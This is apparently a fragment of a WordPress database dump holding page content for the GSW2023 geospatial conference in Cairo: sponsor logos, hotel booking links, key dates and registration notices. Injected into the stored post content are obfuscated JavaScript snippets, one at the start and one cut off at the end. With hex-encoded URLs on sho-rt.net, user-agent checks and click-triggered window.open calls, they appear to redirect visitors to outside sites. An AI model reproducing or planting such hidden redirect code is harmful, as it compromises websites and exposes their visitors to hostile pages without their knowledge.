Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:44:28','2023-06-01 08:44:28','',3066,'https://gsw2023.com/?p=4600',0,'revision','',0),
(4601,1,'2023-06-01 08:45:05','2023-06-01 08:45:05','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685606798260{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685608624099{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 